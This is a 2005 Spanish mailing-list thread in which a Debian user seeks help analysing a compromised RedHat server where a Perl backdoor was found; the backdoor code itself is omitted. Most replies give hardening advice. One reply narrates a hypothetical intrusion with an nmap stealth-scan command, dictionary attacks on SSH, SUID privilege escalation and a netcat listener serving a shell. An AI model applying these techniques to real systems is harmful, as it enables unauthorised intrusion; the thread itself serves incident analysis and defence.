Re: Opiniones ?... Seguridad/hacking-.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: > Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del > crimen contra un servidor que fue hackeado :-( Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria? > en primera instancia puedo creer que el ataque fue hecho via web ya que > la maquina en si.. no tiene contacto fisico alguno con el exterior a > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en > chroot). Usuarios virtuales en chroot: podrias ampliarnos el concepto? Los paquetes instalados eran todos de repositorios oficiales? > el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web > bases de datos ssh y el equipo se colgo.. > > fue una gran sorpresa al darme cuenta que cuando inicie la makina en > modo rescate /var estaba vacio practicamente piendo en un rm > -rf /var :-(... por ende.. no tengo logs para buscar algun tipo de > atake.. pero buscando en /tmp encontre algo interezante un archivo > llamado _conex.pl_ > > cuyo contenido muestro aqui. > > [Codigo perl de una puerta trasera] Alguna referencia: http://www.experts-exchange.com/Security/Linux_Security/Q_21291502.html Lo que entiendo de alli es que mediante netcat se conecta al 9000...para explotar alguan vulnerabilidad. Lo que no me queda claro es si para acceder a tu host explotó esa vuln o lo hizo desde dentro...en tal caso...como entro? > y me dije que diablos !!!... > entonces.. me decidi a preguntar a la lista por si alguien mas o menos > entiende este script o podria decir como funciona.. para tomar > precauciones en la proxima reinstalacion del servidor. y asi protejer > mejor los servicios. y claro esta.. asi todos aprendemos un poquito > mas de seguridad que es tan importante. > Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un > informe claro y Tecnico de lo sucedido aqui. > > Atentamente > Nelson Lopez. > > - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCvBxykw12RhFuGy4RAhWsAJ4oVPdXzb/nDLVhs+twwV/+u19hZACggPc3 04Qp5nKs9XckcvIKIiAOEiI= =BCVH -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
El vie, 10-06-2005 a las 12:15 -0400, Nelson escribió: > en primera instancia puedo creer que el ataque fue hecho via web ya que > la maquina en si.. no tiene contacto fisico alguno con el exterior a > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en > chroot). Lo más probable es que usaran alguna vulnerabilidad de alguna de tus aplicaciones web (con un software tan viejo como el que usas, sería muy fácil si no estaba parcheado). A partir de ahí puede ejecutar cualquier cosa, o bien con un SQLInjection o aprovechando otra entrada de texto no comprobada de un "form". Por ejemplo pudo haber usado wget o lynx para bajar el backdoor que adjuntas. y ejecutarlo. Te da igual el cortafuegos porque en todo momento está usando el puerto 80 que tienes que tener abierto para dar servicio web. Lo que puedes hacer para el futuro es capar el 80 de salida y los de ftp para que no puedan hacer lo que describo. Borar wget y lynx también es una buena idea. Así lo tengo yo salvo para la máquina de debian para el apt. Esto es válido si la máquina no se va a utilizar para navegar (en un servidor debe valer). El backdoor te abre una consola privilegiada en un puerto arbitrario, y a partir de ahí ya puede hacer lo que quiera (como borrar el /var). Quizá un cortafuegos con todo cerrado por defecto te hubiera salvado. El ataque no tiene mayor complicación, tiene la pinta de ser un script-kiddy (o como se escriba) no un cracker. Suerte para la próxima. -- faro arroba escomposlinux punto org http://antares.escomposlinux.org http://wiki.escomposlinux.org http://libertonia.escomposlinux.org Debian GNU/Linux - Usuario Linux #162541 signature.asc Description: This is a digitally signed message part
Re: Opiniones ?... Seguridad/hacking-.
Espero no haber llegado demasiado tarde :(. Si quieres saber qué ocurrió en tu servidor, y todavía no reinstalaste nada, plantéate hacer un análisis forense. Hay herramientas, tipo tct (The coroner's toolkit) o autopsy, creo que era otra, que te permitirán "desborrar" tu disco duro, con lo que podrías recuperar los archivos de log. También podrías analizar binarios, comprobar si crearon nuevos usuarios para ver si quedó algo en sus directorios home, podrías buscar directorios ocultos en tu sistema donde pudiesen haber descargado los archivos que usaron como exploits... Hubo una especie de concurso hace poco, os paso el link [1], donde precisamente se ponía a disposición del público una serie de imágenes de disco de un "honey pot" que cumplió su objetivo, esto es, fue atacado. El concurso proponía intentar descubrir todo lo posible acerca del asalto. Bueno, os dejo que voy a cenar :) [1] http://www.seguridad.unam.mx/eventos/reto/
Re: Opiniones ?... Seguridad/hacking-.
Hola. Bueno, observando las versiones de software de tu servidor podemos hacernos una idea de que el intruso no tubo mayores problemas para comprometer tu servidor. Como lo comentaron antes lo que hice fue narrar una historia sencilla, que viéndolo bien de pronto no fue así :) :) Bueno, ahora que te pusieron atrabajar y tienes que montar otra vez el sistema intenta hacerlo bien desde el inicio. Primero que todo debes preguntarte que servicios quieres ofrecer en tu servidor y porque? Sera realmente necesario el ftp? cuantos usuarios tendrá el sistema? por que no implementar un ftp con socket seguro? es necesario el http? que módulos debe tener instalados? utiliza algún lenguaje del lado del servidor? utilizas alguna base de datos? dependiendo de que servicios quieres montar, haces un particionamiento de disco adecuado, auque no lo creas esto te permite asegurar de una manera grandiosa tu servidor, debian ofrece al momento de la instalación una manera fantástica para particionar y colocar quotas de grupo de usuario programas con suid, ejecución de programas. un montón de cosas por ejemplo podrías crear una partición para /tmp la cual no permita ejecución de guiones ni de nada. luego de esto debes pensar en cual es el demonio adecuado y como centralizar la autenticación de los usuarios. No instales programas que no utilizaras en un servidor: juegos, suite de ofimática soporte para algunos lenguajes, compiladores y demás... esto puede ser el quiebre de tu sistema en algún momento. Si lees el manual de seguridad de DEBIAN, encontraras varias formas de fortalecer tu sistema. Bueno, cambiando de tema te voy a dar un consejo, si me lo permites claro esta! NUNCA te confíes de un firewall, en la mayoría de veces no sirve para nada. Muchos administradores se confían en sus reglas de firewall y dejan de lado las aplicaciones de sus sistema. ejemplo:conocí un sistema del gobierno de un lejano país que tenia todas las reglas de seguridad que tu quieras... hahaha que patético, era tan facil acceder a sus datos que pu. El problema un error en la programación, errores de SQLinjection XSS Esto lo digo para que lo pienses, preocupate por tus desarrollos y de esta forma tu sistema sera más seguro. Bueno, para terminar, siempre mira tus logs y guardarlos en cintas o algo similar. Saludos
Re: Opiniones ?... Seguridad/hacking-.
Ricardo Frydman wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió: Hola. Bueno, primero que todo mi sentido pesame por tu servidor espero que renasca de las cenizas y sea mejor que antes :) ok, iniciemos, voy a plantear una posibilidad de lo que sucedio en tu servidor. el atacante lo primero que realizo fue un scaneo de puertos desde alguna maquina remota que tal vez ya estaba comprometida o que tal vez era su maquina real o un proxy... no sabemos miro los puertos nmap -sS -sV -O -v -P0 tuip con esto consiguio pasarte por encima de tu firewall si lo tenias y obtener una lista de los puertos abiertos de tu servidor junto con las versiones de los demonios que ellos corrian. ya teniendo esto y observando que tenias el ftp y sshd abiertos la tarea que le sigue es buscar en la pagina en internet o en google buscando correos electronicos por ejemplo [EMAIL PROTECTED] ...bueno, teniendo estas cuentas y siendo obtimistas de que en tu servidor creaste usuarios reales en el sistema y no en una base de datos y que a ellos le colocaste en la shell /bin/bash en vez de de /bin/false... el atacante inicia en la busqueda de un exploit para tus demonios, si no lo encuentra entonces iniciara un ataque de diccionario sobre tus servicios, creo que inicio por el sshd... suponiendo que despues de varias horas de intentar obtuvo una entrada a tu sistema por medio de un usuariohttp://www.google.com.co/ con una muy mala contraseña... luego el atacante ya tiene una shell e inicia en la busqueda de errores internos en busqueda de una escalada de privilegios, puede buscar programas con SUID o detenerse y observar en securityfocus.com cientos de errores de seguridad que puede contener tu sistema. Suponiendo de despues de varias horas escaneando tu sistema por dentro y teniendo un exploit local consiguio acceso al root... despues de este punto tu maquina ya esta perdida y no hace falta imaginarnos que podria hacer con este poder!!! El script en perl que nombras es muy sencillo. el recive dos parametros que son los siguiente el nombre del host y su ip envia una peticion a dicho puerto de el nombre de la maquina y una shell claro que este script no funciona para nada si antes inicialisaste un puerto con shell... me explico: esto se haria por ejemplo con netcat, este permite crear un demonio que escuche determonado puerto y que cuando el se conecte le sirva un determinado archivo, ejemplo /bin/sh entonces el atacante ejecuta el guion en perl para conectarse a otra maquina objetivo conclusion: utiliso tu maquina como puente para atacar otras redes. claro que podria suponer que es muy novato o un scriptkid ya que destruyo tu sistema... yo permaneceria con una cuenta privilegiada en tu sistema :) Bueno, creo que eso es todo por el momento... si seme ocurre algomas estare escribiendo Saludos. uf pero si casi parece una conspiracion contra el presidente :o !!!.. Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando reconstruir lo sucedido".puede no ser lo que paso (en realidad no creo que haya sido asi XD) esos parametros de nmap nos los conocia y me parecieron bastante interesantes y asombrosos.. mas bien. preocupante diria yo.. Depende como configures tu firewall... que hacer ante un caso como este ?... de que forma se podria prevenir este tipo de scaneos en un sistema ?... Configurando adecuadamente tu firewall para prevenirte contra ese tipo de escaneos + otras herramientas de deteccion, aunque dudo que lo necesites, si me lo preguntas... que preocupante poder ver este tipo de accion. y ver que no basta con las posibles "soluciones de seguridad" que se implementen siempre habra algo que logre saltar un sistema =/... Bueno, es cuestion de reducir posibilidades...como te conteste recien en otro correo, creo que dejaste las cosas demasiado al azar por decirlo de algun modo... salu2 y en este mismo momento me dispongo a reeleer el manual de iptables para mejorar el firewall de aquella empresa... Puedes leer tambien: http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html consejos ?.. Ahi fue uno... Otro: olvida la paranoia, que te sirva para el futuro - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd 9M9W04rQ/QSkeAkNjw1uvPA= =vKmw -END PGP SIGNATURE- No seria malo que el sistema te enviara los logs al correo Saludos compatriota... Danny R. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
El vie, 10-06-2005 a las 15:38 -0300, Ricardo Frydman escribió: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Nelson wrote: > > Muchas gracias por los consejos y lo de la paranoia quisas si entre un > > poco en panico.. pero como dices la guardare para el futuro.. ahora me > > dedicare a robustecer el firewall :-)... > Que distribucion piensas instalar? ;) Por Supuesto que Debian =).. en realidad yo soy un debianero hace mucho tiempo.. pero ese servidor no es mio.. solo estoy ayudando =).. > > > > > muchas gracias.. > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: > Muchas gracias por los consejos y lo de la paranoia quisas si entre un > poco en panico.. pero como dices la guardare para el futuro.. ahora me > dedicare a robustecer el firewall :-)... Que distribucion piensas instalar? ;) > > muchas gracias.. > > - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCqd4Ukw12RhFuGy4RAhpLAKCAO7Nhbu9CTIuNauS4JKHMNMUCYwCeMjD3 Fnw6RMNwv2TdiVruzwL92UM= =0jw/ -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
El vie, 10-06-2005 a las 15:30 -0300, Ricardo Frydman escribió: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Nelson wrote: > > El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió: > > > >>Hola. > >> > >>Bueno, primero que todo mi sentido pesame por tu servidor > >>espero que renasca de las cenizas y sea mejor que antes :) > >> > >>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio > >>en tu servidor. > >> > >>el atacante lo primero que realizo fue un scaneo de puertos > >>desde alguna maquina remota que tal vez ya estaba comprometida > >>o que tal vez era su maquina real o un proxy... no sabemos > >>miro los puertos > >> > >>nmap -sS -sV -O -v -P0 tuip > >> > >>con esto consiguio pasarte por encima de tu firewall si lo tenias y > >>obtener > >>una lista de los puertos abiertos de tu servidor junto con > >>las versiones de los demonios que ellos corrian. > >> > >>ya teniendo esto y observando que tenias el ftp y sshd abiertos > >>la tarea que le sigue es buscar en la pagina en internet o en google > >>buscando correos electronicos por ejemplo [EMAIL PROTECTED] > >>...bueno, teniendo estas cuentas y siendo obtimistas de que > >>en tu servidor creaste usuarios reales en el sistema y no > >>en una base de datos y que a ellos le colocaste en la shell /bin/bash > >>en vez de de /bin/false... el atacante inicia en la busqueda de un > >>exploit > >>para tus demonios, si no lo encuentra entonces iniciara un > >>ataque de diccionario sobre tus servicios, creo que inicio por > >>el sshd... suponiendo que despues de varias horas de intentar > >>obtuvo una entrada a tu sistema por medio de un > >>usuariohttp://www.google.com.co/ > >>con una muy mala contraseña... luego el atacante ya tiene una shell > >>e inicia en la busqueda de errores internos en busqueda de una > >>escalada de privilegios, puede buscar programas con SUID o detenerse > >>y observar en securityfocus.com cientos de errores de seguridad > >>que puede contener tu sistema. > >>Suponiendo de despues de varias horas escaneando tu sistema por dentro > >>y teniendo un exploit local consiguio acceso al root... despues de > >>este punto > >>tu maquina ya esta perdida y no hace falta imaginarnos que podria > >>hacer > >>con este poder!!! > >> > >>El script en perl que nombras es muy sencillo. > >>el recive dos parametros que son los siguiente el nombre del host y su > >>ip > >>envia una peticion a dicho puerto de el nombre de la maquina y una > >>shell > >>claro que este script no funciona para nada si antes inicialisaste un > >>puerto > >>con shell... me explico: esto se haria por ejemplo con netcat, este > >>permite > >>crear un demonio que escuche determonado puerto y que cuando el se > >>conecte > >>le sirva un determinado archivo, ejemplo /bin/sh > >> > >>entonces el atacante ejecuta el guion en perl para conectarse a otra > >>maquina objetivo > >>conclusion: utiliso tu maquina como puente para atacar otras redes. > >>claro que podria suponer que es muy novato o un scriptkid ya que > >>destruyo > >>tu sistema... yo permaneceria con una cuenta privilegiada en tu > >>sistema :) > >> > >>Bueno, creo que eso es todo por el momento... si seme ocurre algomas > >>estare escribiendo > >> > >>Saludos. > > > > > > > > > > uf > > pero si casi parece una conspiracion contra el presidente :o !!!.. > Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando > reconstruir lo sucedido".puede no ser lo que paso (en realidad no > creo que haya sido asi XD) > > > esos parametros de nmap nos los conocia y me parecieron bastante > > interesantes y asombrosos.. mas bien. preocupante diria yo.. > Depende como configures tu firewall... > > > que hacer ante un caso como este ?... de que forma se podria prevenir > > este tipo de scaneos en un sistema ?... > Configurando adecuadamente tu firewall para prevenirte contra ese tipo > de escaneos + otras herramientas de deteccion, aunque dudo que lo > necesites, si me lo preguntas... > > > que preocupante poder ver este tipo de accion. y ver que no basta con > > las posibles "soluciones de seguridad" que se implementen siempre habra > > algo que logre saltar un sistema =/... > Bueno, es cuestion de reducir posibilidades...como te conteste recien en > otro correo, creo que dejaste las cosas demasiado al azar por decirlo de > algun modo... > > > salu2 y en este mismo momento me dispongo a reeleer el manual de > > iptables para mejorar el firewall de aquella empresa... > Puedes leer tambien: > http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html > > > consejos ?.. > Ahi fue uno... > Otro: olvida la paranoia, que te sirva para el futuro > Muchas gracias por los consejos y lo de la paranoia quisas si entre un poco en panico.. pero como dices la guardare para el futuro.. ahora me dedicare a robustecer el firewall :-)... muchas gracias.. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL P
Re: Opiniones ?... Seguridad/hacking-.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: > El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió: > >>Hola. >> >>Bueno, primero que todo mi sentido pesame por tu servidor >>espero que renasca de las cenizas y sea mejor que antes :) >> >>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio >>en tu servidor. >> >>el atacante lo primero que realizo fue un scaneo de puertos >>desde alguna maquina remota que tal vez ya estaba comprometida >>o que tal vez era su maquina real o un proxy... no sabemos >>miro los puertos >> >>nmap -sS -sV -O -v -P0 tuip >> >>con esto consiguio pasarte por encima de tu firewall si lo tenias y >>obtener >>una lista de los puertos abiertos de tu servidor junto con >>las versiones de los demonios que ellos corrian. >> >>ya teniendo esto y observando que tenias el ftp y sshd abiertos >>la tarea que le sigue es buscar en la pagina en internet o en google >>buscando correos electronicos por ejemplo [EMAIL PROTECTED] >>...bueno, teniendo estas cuentas y siendo obtimistas de que >>en tu servidor creaste usuarios reales en el sistema y no >>en una base de datos y que a ellos le colocaste en la shell /bin/bash >>en vez de de /bin/false... el atacante inicia en la busqueda de un >>exploit >>para tus demonios, si no lo encuentra entonces iniciara un >>ataque de diccionario sobre tus servicios, creo que inicio por >>el sshd... suponiendo que despues de varias horas de intentar >>obtuvo una entrada a tu sistema por medio de un >>usuariohttp://www.google.com.co/ >>con una muy mala contraseña... luego el atacante ya tiene una shell >>e inicia en la busqueda de errores internos en busqueda de una >>escalada de privilegios, puede buscar programas con SUID o detenerse >>y observar en securityfocus.com cientos de errores de seguridad >>que puede contener tu sistema. >>Suponiendo de despues de varias horas escaneando tu sistema por dentro >>y teniendo un exploit local consiguio acceso al root... despues de >>este punto >>tu maquina ya esta perdida y no hace falta imaginarnos que podria >>hacer >>con este poder!!! >> >>El script en perl que nombras es muy sencillo. >>el recive dos parametros que son los siguiente el nombre del host y su >>ip >>envia una peticion a dicho puerto de el nombre de la maquina y una >>shell >>claro que este script no funciona para nada si antes inicialisaste un >>puerto >>con shell... me explico: esto se haria por ejemplo con netcat, este >>permite >>crear un demonio que escuche determonado puerto y que cuando el se >>conecte >>le sirva un determinado archivo, ejemplo /bin/sh >> >>entonces el atacante ejecuta el guion en perl para conectarse a otra >>maquina objetivo >>conclusion: utiliso tu maquina como puente para atacar otras redes. >>claro que podria suponer que es muy novato o un scriptkid ya que >>destruyo >>tu sistema... yo permaneceria con una cuenta privilegiada en tu >>sistema :) >> >>Bueno, creo que eso es todo por el momento... si seme ocurre algomas >>estare escribiendo >> >>Saludos. > > > > > uf > pero si casi parece una conspiracion contra el presidente :o !!!.. Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando reconstruir lo sucedido".puede no ser lo que paso (en realidad no creo que haya sido asi XD) > esos parametros de nmap nos los conocia y me parecieron bastante > interesantes y asombrosos.. mas bien. preocupante diria yo.. Depende como configures tu firewall... > que hacer ante un caso como este ?... de que forma se podria prevenir > este tipo de scaneos en un sistema ?... Configurando adecuadamente tu firewall para prevenirte contra ese tipo de escaneos + otras herramientas de deteccion, aunque dudo que lo necesites, si me lo preguntas... > que preocupante poder ver este tipo de accion. y ver que no basta con > las posibles "soluciones de seguridad" que se implementen siempre habra > algo que logre saltar un sistema =/... Bueno, es cuestion de reducir posibilidades...como te conteste recien en otro correo, creo que dejaste las cosas demasiado al azar por decirlo de algun modo... > salu2 y en este mismo momento me dispongo a reeleer el manual de > iptables para mejorar el firewall de aquella empresa... Puedes leer tambien: http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html > consejos ?.. Ahi fue uno... Otro: olvida la paranoia, que te sirva para el futuro > > - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd 9M9W04rQ/QSkeAkNjw1uvPA= =vKmw -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió: > Hola. > > Bueno, primero que todo mi sentido pesame por tu servidor > espero que renasca de las cenizas y sea mejor que antes :) > > ok, iniciemos, voy a plantear una posibilidad de lo que sucedio > en tu servidor. > > el atacante lo primero que realizo fue un scaneo de puertos > desde alguna maquina remota que tal vez ya estaba comprometida > o que tal vez era su maquina real o un proxy... no sabemos > miro los puertos > > nmap -sS -sV -O -v -P0 tuip > > con esto consiguio pasarte por encima de tu firewall si lo tenias y > obtener > una lista de los puertos abiertos de tu servidor junto con > las versiones de los demonios que ellos corrian. > > ya teniendo esto y observando que tenias el ftp y sshd abiertos > la tarea que le sigue es buscar en la pagina en internet o en google > buscando correos electronicos por ejemplo [EMAIL PROTECTED] > ...bueno, teniendo estas cuentas y siendo obtimistas de que > en tu servidor creaste usuarios reales en el sistema y no > en una base de datos y que a ellos le colocaste en la shell /bin/bash > en vez de de /bin/false... el atacante inicia en la busqueda de un > exploit > para tus demonios, si no lo encuentra entonces iniciara un > ataque de diccionario sobre tus servicios, creo que inicio por > el sshd... suponiendo que despues de varias horas de intentar > obtuvo una entrada a tu sistema por medio de un > usuariohttp://www.google.com.co/ > con una muy mala contraseña... luego el atacante ya tiene una shell > e inicia en la busqueda de errores internos en busqueda de una > escalada de privilegios, puede buscar programas con SUID o detenerse > y observar en securityfocus.com cientos de errores de seguridad > que puede contener tu sistema. > Suponiendo de despues de varias horas escaneando tu sistema por dentro > y teniendo un exploit local consiguio acceso al root... despues de > este punto > tu maquina ya esta perdida y no hace falta imaginarnos que podria > hacer > con este poder!!! > > El script en perl que nombras es muy sencillo. > el recive dos parametros que son los siguiente el nombre del host y su > ip > envia una peticion a dicho puerto de el nombre de la maquina y una > shell > claro que este script no funciona para nada si antes inicialisaste un > puerto > con shell... me explico: esto se haria por ejemplo con netcat, este > permite > crear un demonio que escuche determonado puerto y que cuando el se > conecte > le sirva un determinado archivo, ejemplo /bin/sh > > entonces el atacante ejecuta el guion en perl para conectarse a otra > maquina objetivo > conclusion: utiliso tu maquina como puente para atacar otras redes. > claro que podria suponer que es muy novato o un scriptkid ya que > destruyo > tu sistema... yo permaneceria con una cuenta privilegiada en tu > sistema :) > > Bueno, creo que eso es todo por el momento... si seme ocurre algomas > estare escribiendo > > Saludos. uf pero si casi parece una conspiracion contra el presidente :o !!!.. esos parametros de nmap nos los conocia y me parecieron bastante interesantes y asombrosos.. mas bien. preocupante diria yo.. que hacer ante un caso como este ?... de que forma se podria prevenir este tipo de scaneos en un sistema ?... que preocupante poder ver este tipo de accion. y ver que no basta con las posibles "soluciones de seguridad" que se implementen siempre habra algo que logre saltar un sistema =/... salu2 y en este mismo momento me dispongo a reeleer el manual de iptables para mejorar el firewall de aquella empresa... consejos ?.. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: > El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió: > > Nelson wrote: > >>Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del >>crimen contra un servidor que fue hackeado :-( > > Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria? > > >> Distribucion RedHat 9 Insegura de fábrica. Discontinuada desde hace un año (!) >> kernel 2.4.20-8 2 Siglos de antiguedad...varios fallos descubiertos, parchado? >> firewall iptables configuracion basica solo permitia ftp y web "solo permitia ftp" _solo_ eso ya es mucho... >> paquetes instalados. la base + los paquetes de apache mysql php y >> pureftpd oficial compilado. Actualizado a fecha?. >> PS: se que esta es una lista debian, pero necesito recaudar datos >> hacerca del tema. es preocupante lo que sucedio. pido disculpas si >> molesto a alguien. :-) En realidad no molestassiempre y cuando ahora le pongas, como Dios manda, un Debian Sarge y te preocupes un minimo por administrarlo adecuadamente. La seguridad no es *solo* instalar un Sistema Operativo que no tenga (casi) virusConozco servidores Windows infinitamente mas seguros y mejor administrados que muchos Linux... * >>en primera instancia puedo creer que el ataque fue hecho via web ya que >>la maquina en si.. no tiene contacto fisico alguno con el exterior a >>escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en >>chroot). > > Usuarios virtuales en chroot: podrias ampliarnos el concepto? >> pure-ftp permite crear usuarios virtuales atados a un grupo existente en >> la makina sin necesidad de crear el usuario de sistema, solo https://www.linuxrocket.net/index.cgi?a=MailArchiver&ma=ShowMail&Id=190910 imagino esto al dia http://sourceforge.net/tracker/?atid=318317&group_id=18317&func=browse Te puede haber pasado esto: http://www.linuxforum.com/forums/index.php?showtopic=125174 Como alguien dijo por alli, contraseñas debiles. Hay muchos flancos por donde puede haber entradocreo que ahora debes preocuparte por el futuro >> virtualmente y lo del chroot es que el usuario queda atado netamente a >> el "home" o directorio que uno establece para su uso al momento de >> generar el usuario sé lo que es un chroot..aunque lo estés definiendo de manera equivocada ;) http://www.argo.es/~jcea/artic/chroot.htm > Los paquetes instalados eran todos de repositorios oficiales? > > >>el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web >>bases de datos ssh y el equipo se colgo.. que es base de datos ssh? >>fue una gran sorpresa al darme cuenta que cuando inicie la makina en >>modo rescate /var estaba vacio practicamente piendo en un rm >>-rf /var :-(... por ende.. no tengo logs para buscar algun tipo de >>atake.. pero buscando en /tmp encontre algo interezante un archivo >>llamado _conex.pl_ > >>cuyo contenido muestro aqui. > > [Codigo perl de una puerta trasera] > Lo que entiendo es que te instalaron y ejecutaron un programa para abrir > una puerta traseracon exito. > Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o > lo hizo desde dentro...en tal caso...como entro? > > Saludos > > > >> eso es lo que me pregunto yo =/.. >> lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni >> por ssh pudo haber llegado hasta ahi. Bueno hay otros caminos, de eso ahora no te quedan dudas :P > >> la maquina esta detras de un router con ip privada solo acediendo a el >> con redireccion de puertos. > > > >>y me dije que diablos !!!... >>entonces.. me decidi a preguntar a la lista por si alguien mas o menos >>entiende este script o podria decir como funciona.. para tomar >>precauciones en la proxima reinstalacion del servidor. y asi protejer >>mejor los servicios. y claro esta.. asi todos aprendemos un poquito >>mas de seguridad que es tan importante. >>Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un >>informe claro y Tecnico de lo sucedido aqui. > >>Atentamente >>Nelson Lopez. > > > > > -- > Ricardo A.Frydman > Consultor en Tecnología Open Source > Administrador de Sistemas > http://www.eureka-linux.com.ar > > - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCqdbjkw12RhFuGy4RAuGfAJ9r5oFrNPjs2wVtR//uN18u9+dg3ACcC0Je HVevjeNkW7qoF7ZH8r7b7pM= =DC9G -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Nelson wrote: > > Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del > > crimen contra un servidor que fue hackeado :-( > Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria? Distribucion RedHat 9 kernel 2.4.20-8 firewall iptables configuracion basica solo permitia ftp y web paquetes instalados. la base + los paquetes de apache mysql php y pureftpd oficial compilado. PS: se que esta es una lista debian, pero necesito recaudar datos hacerca del tema. es preocupante lo que sucedio. pido disculpas si molesto a alguien. :-) > > > en primera instancia puedo creer que el ataque fue hecho via web ya que > > la maquina en si.. no tiene contacto fisico alguno con el exterior a > > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en > > chroot). > > Usuarios virtuales en chroot: podrias ampliarnos el concepto? pure-ftp permite crear usuarios virtuales atados a un grupo existente en la makina sin necesidad de crear el usuario de sistema, solo virtualmente y lo del chroot es que el usuario queda atado netamente a el "home" o directorio que uno establece para su uso al momento de generar el usuario > > Los paquetes instalados eran todos de repositorios oficiales? > > > el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web > > bases de datos ssh y el equipo se colgo.. > > > > fue una gran sorpresa al darme cuenta que cuando inicie la makina en > > modo rescate /var estaba vacio practicamente piendo en un rm > > -rf /var :-(... por ende.. no tengo logs para buscar algun tipo de > > atake.. pero buscando en /tmp encontre algo interezante un archivo > > llamado _conex.pl_ > > > > cuyo contenido muestro aqui. > > > > > [Codigo perl de una puerta trasera] > Lo que entiendo es que te instalaron y ejecutaron un programa para abrir > una puerta traseracon exito. > Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o > lo hizo desde dentro...en tal caso...como entro? > > Saludos eso es lo que me pregunto yo =/.. lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni por ssh pudo haber llegado hasta ahi. la maquina esta detras de un router con ip privada solo acediendo a el con redireccion de puertos. > > y me dije que diablos !!!... > > entonces.. me decidi a preguntar a la lista por si alguien mas o menos > > entiende este script o podria decir como funciona.. para tomar > > precauciones en la proxima reinstalacion del servidor. y asi protejer > > mejor los servicios. y claro esta.. asi todos aprendemos un poquito > > mas de seguridad que es tan importante. > > Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un > > informe claro y Tecnico de lo sucedido aqui. > > > > Atentamente > > Nelson Lopez. > > > > > > > - -- > Ricardo A.Frydman > Consultor en Tecnología Open Source > 